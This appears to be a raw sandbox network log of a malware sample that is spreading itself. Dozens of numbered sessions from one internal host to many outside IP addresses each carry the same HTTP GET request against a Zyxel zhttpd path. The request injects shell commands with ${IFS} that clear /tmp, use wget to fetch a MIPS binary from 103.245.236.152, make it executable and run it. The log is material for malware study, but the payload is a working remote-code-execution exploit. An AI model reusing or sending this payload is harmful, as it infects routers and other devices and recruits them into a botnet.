                                          Jan 14, 2024 15:46:32.356812954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8426192.168.2.2355186159.96.39.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356842041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8427192.168.2.2335246122.252.127.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356859922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8428192.168.2.2347438108.217.221.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356882095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8429192.168.2.2358166190.109.27.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356929064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8430192.168.2.2358778201.179.8.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356933117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8431192.168.2.2342494165.143.236.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356935024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8432192.168.2.235620896.224.186.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.356957912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8433192.168.2.235175434.136.29.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.359791040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8434192.168.2.2357216116.155.250.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:32.359813929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8435192.168.2.2341738223.132.191.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377171040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8436192.168.2.2337228129.0.228.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377194881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8437192.168.2.235973889.94.29.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377221107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8438192.168.2.2347016191.66.125.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377221107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8439192.168.2.23426122.21.162.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377269030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8440192.168.2.2336200194.229.194.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377310038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8441192.168.2.2353848207.68.2.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377312899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8442192.168.2.234083689.167.175.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377353907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8443192.168.2.2343568182.54.148.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377383947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8444192.168.2.234675670.220.235.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377393007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8445192.168.2.2359814185.154.113.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377418041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8446192.168.2.234437475.81.192.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377438068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8447192.168.2.234122645.57.164.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377454996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8448192.168.2.2337964201.131.255.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377494097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8449192.168.2.2350008157.16.83.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377528906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8450192.168.2.2339414206.226.103.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377532005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8451192.168.2.2355284137.11.208.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377547979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8452192.168.2.235157452.156.248.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377583027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8453192.168.2.233713294.2.92.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377629995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8454192.168.2.235359045.47.46.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377650976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8455192.168.2.2358284110.16.166.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377686977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8456192.168.2.2339826124.14.33.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377688885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8457192.168.2.234104059.230.57.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377728939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8458192.168.2.2349418170.18.185.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377743006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8459192.168.2.235544820.247.177.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377789021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8460192.168.2.2349244204.85.16.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377820015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8461192.168.2.2348472223.182.131.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377851963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8462192.168.2.2356456128.16.239.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377870083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8463192.168.2.234701887.241.47.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377885103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8464192.168.2.235155896.162.243.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377902031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8465192.168.2.235636496.10.179.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377918005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8466192.168.2.2340546145.222.194.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377949953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8467192.168.2.235923099.125.220.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.377995968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8468192.168.2.2355072132.108.162.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378043890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8469192.168.2.2339164211.6.52.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378081083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8470192.168.2.2344204219.16.13.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378114939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8471192.168.2.233914237.166.56.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378125906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8472192.168.2.2349336139.159.116.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378149986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8473192.168.2.233500838.203.98.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378186941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8474192.168.2.2335650105.35.231.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378202915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8475192.168.2.2357860133.185.141.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378228903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8476192.168.2.236060225.73.0.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378249884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8477192.168.2.233786274.246.54.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378262043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8478192.168.2.233668819.146.205.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378309965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8479192.168.2.234456497.127.110.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378321886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8480192.168.2.2334972146.173.62.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378341913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8481192.168.2.2346864197.1.139.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378376007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8482192.168.2.236087487.127.171.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378410101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8483192.168.2.233399281.155.60.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378437042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8484192.168.2.234967014.244.182.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378449917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8485192.168.2.233630897.141.247.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378494024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8486192.168.2.2336696156.95.40.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378495932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8487192.168.2.2333662138.129.149.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378495932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8488192.168.2.235971039.54.153.232443
                                          TimestampBytes transferredDirectionData
